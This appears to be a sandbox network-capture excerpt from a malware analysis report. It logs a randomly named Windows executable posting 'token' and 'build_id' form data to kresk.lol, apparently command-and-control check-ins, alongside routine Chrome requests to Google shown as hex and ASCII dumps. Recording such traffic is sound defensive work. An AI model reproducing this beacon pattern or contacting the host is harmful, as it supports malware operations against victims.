                                                                                                                                                                      2024-12-04 16:04:39 UTC6837OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------MOP8G4OPZ58YUAA1D26PCont
                                                                                                                                                                      2024-12-04 16:04:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:40 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      9192.168.2.449745159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:40 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----MOP8G4OPZ58YUAA1D26P
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:40 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 34 4f 50 5a 35 38 59 55 41 41 31 44 32 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------MOP8G4OPZ58YUAA1D26PContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------MOP8G4OPZ58YUAA1D26PCont
                                                                                                                                                                      2024-12-04 16:04:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:41 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      10192.168.2.449751142.250.181.684435020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:43 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-12-04 16:04:44 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:44 GMT
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iJYtYAyxvxRfeWcrUHnesw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      2024-12-04 16:04:44 UTC124INData Raw: 63 35 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 61 74 68 20 6f 66 20 65 78 69 6c 65 20 65 61 72 6c 79 20 61 63 63 65 73 73 20 63 6c 61 73 73 65 73 22 2c 22 73 75 72 76 69 76 69 6e 67 20 62 61 72 73 74 6f 6f 6c 20 63 61 73 74 22 2c 22 70 72 69 6e 63 65 73 73 20 63 72 75 69 73 65 73 20 6d 61 6e 20 6f 76 65 72 62 6f 61 72 64 22 2c 22 73 70 6f 74 69 66 79 20 77 72 61 70
                                                                                                                                                                      Data Ascii: c52)]}'["",["path of exile early access classes","surviving barstool cast","princess cruises man overboard","spotify wrap
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 70 65 64 20 32 30 32 34 20 61 72 74 69 73 74 73 22 2c 22 74 72 65 76 6f 72 20 6c 61 77 72 65 6e 63 65 20 74 65 78 61 6e 73 22 2c 22 70 6c 61 79 73 74 61 74 69 6f 6e 20 70 73 35 20 33 30 74 68 20 61 6e 6e 69 76 65 72 73 61 72 79 22 2c 22 63 68 69 6e 61 20 62 61 6e 73 20 65 78 70 6f 72 74 73 22 2c 22 73 6b 65 6c 65 74 6f 6e 20 63 72 65 77 20 73 74 61 72 20 77 61 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f
                                                                                                                                                                      Data Ascii: ped 2024 artists","trevor lawrence texans","playstation ps5 30th anniversary","china bans exports","skeleton crew star wars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 47 62 47 74 30 52 6d 35 4f 53 47 46 6f 56 55 56 68 5a 31 5a 77 4e 57 5a 6e 56 47 67 77 65 6e 70 4b 53 30 39 78 65 6c 42 4e 57 45 63 7a 5a 7a 42 6f 51 56 46 7a 4d 48 6c 42 54 32 46 4f 56 32 74 44 52 58 46 4a 63 31 5a 49 64 6b 46 47 61 6a 4e 33 62 31 70 73 61 33 68 76 4e 6d 78 32 55 58 52 54 4d 6b 68 46 53 6c 64 47 54 30 52 54 59 6d 6f 7a 51 58 42 54 56 45 56 4c 4d 55 70 70 56 48 4e 69 4e 45 5a 59 54 6a 56 4c 4d 48 4e 77 55 32 78 33 55 56 4a 36 55 48 5a 73 55 6b 64 76 56 45 34 33 4d 33 5a 6c 4c 31 68 42 4e 31 68 4f 63 47 46 79 62 56 56 6b 55 54 51 79 56 79 39 6b 53 30 5a 46 59 56 51 30 4b 32 59 32 57 56 42 61 59 6d 4a 69 52 6a 49 78 63 6c 4a 78 4d 43 73 77 5a 45 6c 4b 61 6d 46 4f 63 30 52 56 65 6d 4a 69 54 31 6c 56 5a 46 45 32 62 32 68 44 53 44 42 4d 57 44
                                                                                                                                                                      Data Ascii: GbGt0Rm5OSGFoVUVhZ1ZwNWZnVGgwenpKS09xelBNWEczZzBoQVFzMHlBT2FOV2tDRXFJc1ZIdkFGajN3b1psa3hvNmx2UXRTMkhFSldGT0RTYmozQXBTVEVLMUppVHNiNEZYTjVLMHNwU2x3UVJ6UHZsUkdvVE43M3ZlL1hBN1hOcGFybVVkUTQyVy9kS0ZFYVQ0K2Y2WVBaYmJiRjIxclJxMCswZElKamFOc0RVemJiT1lVZFE2b2hDSDBMWD
                                                                                                                                                                      2024-12-04 16:04:44 UTC257INData Raw: 48 56 56 61 6c 5a 4e 4b 30 4e 45 4d 48 52 43 56 6b 56 52 53 58 64 79 5a 48 46 47 65 47 78 48 54 7a 5a 72 59 6c 68 46 4e 58 70 49 61 47 31 74 62 33 4d 33 52 6c 5a 56 63 46 63 7a 63 48 42 44 5a 31 52 35 65 57 77 78 56 58 56 46 4d 6b 39 33 51 31 6b 32 61 6c 5a 6a 55 55 31 59 52 45 64 6c 4d 48 4a 79 61 6e 56 52 57 6d 4a 73 54 6c 45 77 4d 56 56 51 53 57 45 31 4e 33 4a 78 51 7a 4e 36 5a 30 77 72 65 55 6c 42 54 6e 42 4e 61 32 56 45 61 57 6c 35 5a 6b 35 78 5a 45 64 69 4d 48 70 31 57 6a 5a 44 64 7a 42 6b 55 32 52 6c 65 56 46 4f 5a 31 52 32 52 57 35 43 4f 55 78 34 51 6c 46 32 64 56 56 75 4d 44 4e 70 64 57 78 6b 53 7a 5a 61 59 6a 64 6a 59 7a 5a 56 61 30 45 7a 52 56 4a 4e 52 46 52 5a 4f 55 70 74 4b 30 31 33 62 7a 5a 6f 52 33 68 31 55 54 55 76 57 45 35 57 56 45 4e 75
                                                                                                                                                                      Data Ascii: HVValZNK0NEMHRCVkVRSXdyZHFGeGxHTzZrYlhFNXpIaG1tb3M3RlZVcFczcHBDZ1R5eWwxVXVFMk93Q1k2alZjUU1YREdlMHJyanVRWmJsTlEwMVVQSWE1N3JxQzN6Z0wreUlBTnBNa2VEaWl5Zk5xZEdiMHp1WjZDdzBkU2RleVFOZ1R2RW5COUx4QlF2dVVuMDNpdWxkSzZaYjdjYzZVa0EzRVJNRFRZOUptK013bzZoR3h1UTUvWE5WVENu
                                                                                                                                                                      2024-12-04 16:04:44 UTC90INData Raw: 35 34 0d 0a 54 31 70 79 62 56 4a 6d 64 32 51 30 55 47 64 42 4c 33 5a 33 59 30 70 35 56 6e 52 75 54 56 64 50 5a 46 5a 70 62 6c 52 36 61 30 5a 55 4e 46 52 79 4e 56 45 78 5a 6d 52 48 4f 57 39 74 53 54 64 6b 53 55 39 4d 51 6a 6b 32 62 31 45 32 56 32 46 6f 59 56 68 47 0d 0a
                                                                                                                                                                      Data Ascii: 54T1pybVJmd2Q0UGdBL3Z3Y0p5VnRuTVdPZFZpblR6a0ZUNFRyNVExZmRHOW9tSTdkSU9MQjk2b1E2V2FoYVhG
                                                                                                                                                                      2024-12-04 16:04:44 UTC1231INData Raw: 34 63 38 0d 0a 4d 48 70 35 4d 47 68 54 56 55 70 55 4f 57 39 6e 65 45 46 46 61 56 46 45 4c 30 46 4f 64 30 70 73 63 6d 46 59 63 7a 4a 35 4d 57 68 35 56 6d 63 78 59 6c 4e 4a 54 6d 64 4b 59 30 56 70 54 44 6c 36 4c 32 4a 45 54 32 4a 46 55 6c 4a 56 51 32 46 43 57 57 4d 31 63 6d 6c 5a 56 56 4e 52 63 45 74 72 55 6b 4a 72 4f 55 39 6f 62 6a 51 79 4f 46 6c 69 64 55 5a 6c 55 6c 56 43 4d 57 77 77 54 46 64 33 62 32 70 58 52 32 6c 4f 59 56 4a 30 53 54 5a 55 54 69 39 51 57 47 4d 30 56 48 4d 78 59 6e 41 32 56 33 4e 59 56 45 30 31 61 55 74 30 51 30 4e 56 4b 32 39 68 55 31 46 6e 4c 32 6c 53 53 69 39 4f 4c 30 55 33 62 56 52 4d 54 54 42 6c 62 30 30 79 55 6c 55 31 54 6e 4a 53 63 48 4e 73 52 48 4e 49 56 55 52 31 52 6d 51 76 4f 45 52 79 61 6e 68 35 53 55 64 77 4e 6b 46 58 57 6e
                                                                                                                                                                      Data Ascii: 4c8MHp5MGhTVUpUOW9neEFFaVFEL0FOd0pscmFYczJ5MWh5VmcxYlNJTmdKY0VpTDl6L2JET2JFUlJVQ2FCWWM1cmlZVVNRcEtrUkJrOU9objQyOFlidUZlUlVCMWwwTFd3b2pXR2lOYVJ0STZUTi9QWGM0VHMxYnA2V3NYVE01aUt0Q0NVK29hU1FnL2lSSi9OL0U3bVRMTTBlb00yUlU1TnJScHNsRHNIVUR1RmQvOERyanh5SUdwNkFXWn
                                                                                                                                                                      2024-12-04 16:04:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      11192.168.2.449750142.250.181.684435020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:43 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      12192.168.2.449746142.250.181.684435020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:43 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-12-04 16:04:44 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                      Version: 702228742
                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:44 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      2024-12-04 16:04:44 UTC372INData Raw: 31 65 34 37 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                      Data Ascii: 1e47)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
